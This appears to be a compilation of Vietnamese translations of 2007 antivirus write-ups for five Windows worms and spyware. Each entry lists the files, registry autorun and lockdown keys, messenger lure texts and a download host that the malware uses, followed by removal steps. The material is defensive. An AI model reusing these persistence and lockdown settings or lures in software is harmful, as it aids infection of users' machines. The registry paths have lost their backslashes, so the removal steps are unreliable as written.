Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.
bạn tìm đến khóa sau và xóa đi
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}InProcServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallInstall Provider
HKEY_LOCAL_MACHINESOFTWAREMicrosoftDownloadManager
HKEY_LOCAL_MACHINESOFTWAREInstall Provider
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerToolbar{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerToolbarWebBrowser{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
4. Thoát khỏi regedit.

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Whybo.Z

Phát hiện: August 27, 2007
Cập nhật: August 27, 2007 4:43:28 PM
Kiểu: Win32/Fuceb [Computer Associates]
Có kick thước khoảng : 89,088 bytes
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP
Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• %System%serivces.exe
• %SystemDrive%Program FilesCommon FilesMicrosoft Shared[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%Program FilesInternet ExplorerConnection Wizard[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%Program FilesWindows Media Player[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%WINDOWSaddins[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%WINDOWSsystem[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%WINDOWSsystem32[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%WINDOWSsystem32drivers[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%WINDOWSsystem32dllcache[FIVE RANDOM LOWERCASE LETTERS].exe
• %SystemDrive%WINDOWSsystem32IME[FIVE RANDOM LOWERCASE LETTERS].exe


Khởi tạo file vào temporary:
%System%update.bak
%DriveLetter%:setup.exe
%DriveLetter%:AutoRun.inf
Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
Service Name: Services management
Image Path: %System%serivces.exe
• ComPlus Applications;Messenger
• Documents and Settings
• Internet Explorer
• Messenger
• Microsoft Frontpage
• Movie Maker
• NetMeeting
• Outlook Express
• Recycled
• System Volume Information
• Windows Media Player
• Windows NT
• WINDOWS
• WindowsUpdate
• WINNT
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Scrimge.G

Phát hiện: August 17, 2007
Cập nhật: August 20, 2007 2:54:18 AM
Kiểu: Worm
Có kick thước khoảng: 83,456 bytes
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• %Windir%img8017.zip (Worm sao chép với tên file như sau img8017.jpg-www.photoalbums.com.)
• %Windir%winhelp.exe
• C:a.bat

Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"Windows Help Manager" = "winhelp.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle"Windows Help Manager" = "winhelp.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCurrentVersionRunServices"Windows Help Manager" = "winhelp.exe"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa"Windows Help Manager" = "winhelp.exe"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServices"Windows Help Manager" = "winhelp.exe"
HKEY_CURRENT_USERSoftwareMicrosoftOLE"Windows Help Manager" = "winhelp.exe"
HKEY_CURRENT_USERSYSTEMCurrentControlSetControlLsa"Windows Help Manager" = "winhelp.exe"
Tiếp theo nó sẽ tự động Microsoft instant messenging clients (Windows Live Messenger, MSN Messenger, and Windows Messenger) copy và send img807.zip tới tất cả danh sách trong messages
• did you see this?
• look @ this funny picture
• new picture, should I use it?
• cybix told me 2 send this 2 you look at
• Peter, he looks so dumb in this picture

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

4. Tìm đến khóa sau và chỉnh sửa

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"Windows Help Manager" = "winhelp.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle"Windows Help Manager" = "winhelp.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCurrentVersionRunServices"Windows Help Manager" = "winhelp.exe"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa"Windows Help Manager" = "winhelp.exe"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServices"Windows Help Manager" = "winhelp.exe"
HKEY_CURRENT_USERSoftwareMicrosoftOLE"Windows Help Manager" = "winhelp.exe"
HKEY_CURRENT_USERSYSTEMCurrentControlSetControlLsa"Windows Help Manager" = "winhelp.exe"
5. Exit the Registry Editor.

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu Spyware.MSNSpyMonitor

Cập nhật: August 20, 2007 11:44:06 AM
Kiểu: Spyware
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• %UserProfile%Application DataMicrosoftInternet ExplorerQuick LaunchMsnSpy.lnk
• %UserProfile%DesktopMsnSpy.lnk
• %UserProfile%Start MenuProgramsMsnSpyMsnSpy Help.lnk
• %UserProfile%Start MenuProgramsMsnSpyMsnSpy.lnk
• %UserProfile%Start MenuProgramsMsnSpyUninstall.lnk
• %ProgramFiles%MsnSpymsnspy.chm
• %ProgramFiles%MsnSpymsnspy.exe
• %ProgramFiles%MsnSpyreadme.rtf
• %ProgramFiles%MsnSpyUninstall.exe
• %ProgramFiles%MsnSpyWinPcap_3_1.exe

Tiếp theo nó sẽ khởi tạo vào trong regedit
• HKEY_ALL_USERSSoftwareMsnSpy
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallMsnSpy
Nó sẽ lấy thông tin khi mà ngừoi sử dụng Windows Live Messenger, MSN Messenger, and Windows Messenger)
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.
Bạn hãy vào và xóa khóa sau
4. HKEY_ALL_USERSSoftwareMsnSpy
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallMsnSpy
5. Thóat khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt W32.Lashplay

Phát hiện: August 17, 2007
Cập nhật: August 17, 2007 1:35:48 PM
Kiểu: Worm
Có kick thước khoảng : 462,848 Bytes
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
Nó sẽ khởi tạo và copy thêm file vào tất cả các ổ
[DRIVE LETTER]:readme.txt.exe
[DRIVE LETTER]:flashplay.dll
[DRIVE LETTER]:autorun.inf

Và copy vào
%System%flashplay.dll
Tiếp theo nó sẽ khởi tạo vào regedit và sau đó yêu cầu ngừoi dùng cài đặt Browser Helper Object (BHO):
HKEY_CLASSES_ROOTCLSID{25864158-329E-434B-B24F-3DA6F300D30A}
HKEY_CLASSES_ROOTCLSID{25864158-329E-434B-B24F-3DA6F300D30A}InprocServer32(Default Value) = "%System%flashplay.dll"
HKEY_CLASSES_ROOTflashplay.bho
HKEY_CLASSES_ROOTflashplay.bhoClsid(Default Value) = "{25864158-329E-434B-B24F-3DA6F300D30A}"
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerBrowser Helper Objects{25864158-329E-434B-B24F-3DA6F300D30A}
tự động download và update tại Website sau
[http://]film.96163.cn

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.
Nó thêm khóa vào regedit
HKEY_CLASSES_ROOTCLSID{25864158-329E-434B-B24F-3DA6F300D30A}
HKEY_CLASSES_ROOTCLSID{25864158-329E-434B-B24F-3DA6F300D30A}InprocServer32(Default Value) = "%System%flashplay.dll"
HKEY_CLASSES_ROOTflashplay.bho
HKEY_CLASSES_ROOTflashplay.bhoClsid(Default Value) = "{25864158-329E-434B-B24F-3DA6F300D30A}"
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerBrowser Helper Objects{25864158-329E-434B-B24F-3DA6F300D30A}
4. Thoát khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Kabab.A

Phát hiện: August 21, 2007
Cập nhật: August 21, 2007 2:26:05 PM
Kiểu: Worm
Có kick thước khoảng : 78,394 bytes
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000 Windows Vista

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
Khởi tạo ra một số file với thuộc tính sau
• %System%~~~CoUnTeRPaIn~~~.exe
• %System%~~~MeMoRiEs_In_KaBa~~~.exe
• %System%~~~OuUuW_YeAh~~~.exe
• %System%~~~XPDC_KaBa_LoVe~~~.exe
• Other drives on the computer
• %CurrentFolder%
• $IPC shares
• $ADMIN shares
• Tip's Cantik Ala Neni.exe
• Tip's Cantik Ala Nova.exe
• Tip's Cantik Ala Eka.exe
• Tip 's Cantik Ala Riesa
• Administrator.exe
• Tip's Seksi Ala Neni.exe
• Tip's Seksi Ala Nova.exe
• Tip's Seksi Ala Eka.exe
• Tip's Seksi Ala Riesa
• Buku Harian Neni.exe
• Buku Harian Nova.exe
• Buku Harian Eka.exe
• Buku Harian Riesa
• Tip's Hot Ala Neni.exe
• Tip's Hot Ala Nova.exe
• Tip's Hot Ala Eka.exe
• Tip's Hot Ala Riesa
• Teknik Climbing.exe
• Teknik Baca Cuaca.exe
• Teknik Panjat Tebing.exe
• Teknik Pendakian
• Laporan Bulanan.exe
• Laporan Keuangan.exe
• Laporan Gaji.exe
• Laporan Pegawai.exe
• Cara Pakai Counterpain.exe
• Salep Counterpain.exe
• Harga Counterpain.exe
• Guna Counterpain.exe
• BABI.exe
• BABII.exe
• BABIII.exe
• BABIV.exe
• Buku Harian Jayus.exe
• Buku Harian Awliya.exe
• Buku Harian Dimas.exe
• Buku Harian Anggoro
• Buku Harian Arief.exe
• Buku Harian Ucin.exe
• Buku Harian Amien.exe
• Buku Harian Hadi
• Buku Harian Tuja.exe
• Serial Number.exe
• New Source Code.exe
• CD-Key WinXP.exe
• Source Trojan.exe
• Source Brontok.exe
• Dear Diary.exe
• Teknik Penangkal Petir.exe
• Proposal.exe
• Arsip Bulan Juni.exe
• Data Arsip.exe
• Surat Lamaran.exe
• Skripsi.exe
• Tugas Akhir.exe
• BABV.exe
• No Kode ATM.exe
• Contoh Skripsi.exe
• Contoh Tugas Akhir.exe
• Data Skripsi.exe
• Dokumen Rahasia.exe

Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRun"System handler" = "%System%~~~OuUuW_YeAh~~~.exe"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"StartLoad_[COMPUTER NAME]" = "%System%~~~OuUuW_YeAh~~~.exe"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"Loading_[COMPUTER NAME]" = "%System%~~~OuUuW_YeAh~~~.exe"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"LegalNoticeCaption" = "XPDC OuUuW YeAh KABA-LOVE 17/03/2007 -> 22/03/2007"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionWinlogon"LegalNoticeCaption" = "XPDC OuUuW YeAh KABA-LOVE 17/03/2007 -> 22/03/2007"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionWinlogon"LegalNoticeText" = "Welcome To [LOGGED ON USER] Computer ---> ;-)"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"LegalNoticeText" = "Welcome To [LOGGED_ON_USER] Computer ---> ;-)"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"Shell" = "explorer.exe"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"System" = "%System%~~~OuUuW_YeAh~~~.exe"
• HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSystemRestore"DisableConfig" = "1"
• HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSystemRestore"DisableSR" = "1"
• HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller"LimitSystemRestoreCheckpointing" = "1"
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain"Window Title" = "XPDC OuUuW_YeAh KABA-LOVE With COUNTERPAIN ;-)"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableRegistryTools" = "1"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableTaskMgr" = "1"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem"DisableRegistryTools" = "1"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem"DisableTaskMgr" = "1"

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller"DisableMSI" = "1"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableCMD" = "1"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "1"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer"NoFolderOptions" = "1"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced"ShowSuperHidden" = "0"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced"Hidden" = "2"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced"HideFileExt" = "1"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerCabinetState"FullPath" = "1"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerCabinetState"FullPathAddress" = "1"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSystemFileProtection"ShowPopups" = "0"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"SFCDisable" = "0xFFFFFF9D"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"SFCScan" = "0"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"ReportBootOk" = "0"
• HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor"EnableExtensions" = "0"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"Hidden" = "2"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"HideFileExt" = "1"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"ShowSuperHidden" = "0"
• HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows"load" = "%System%~~~OuUuW_YeAh~~~.exe"


Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
Click OK
Bạn tìm tới khóa sau và xóa nó đi
3. HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRun"System handler" = "%System%~~~OuUuW_YeAh~~~.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"StartLoad_[COMPUTER NAME]" = "%System%~~~OuUuW_YeAh~~~.exe"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"Loading_[COMPUTER NAME]" = "%System%~~~OuUuW_YeAh~~~.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"LegalNoticeCaption" = "XPDC OuUuW YeAh KABA-LOVE 17/03/2007 -> 22/03/2007"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionWinlogon"LegalNoticeCaption" = "XPDC OuUuW YeAh KABA-LOVE 17/03/2007 -> 22/03/2007"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionWinlogon"LegalNoticeText" = "Welcome To [LOGGED ON USER] Computer ---> ;-)"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"LegalNoticeText" = "Welcome To [LOGGED_ON_USER] Computer ---> ;-)"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"Shell" = "explorer.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"System" = "%System%~~~OuUuW_YeAh~~~.exe"
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSystemRestore"DisableConfig" = "1"
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSystemRestore"DisableSR" = "1"
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller"LimitSystemRestoreCheckpointing" = "1"
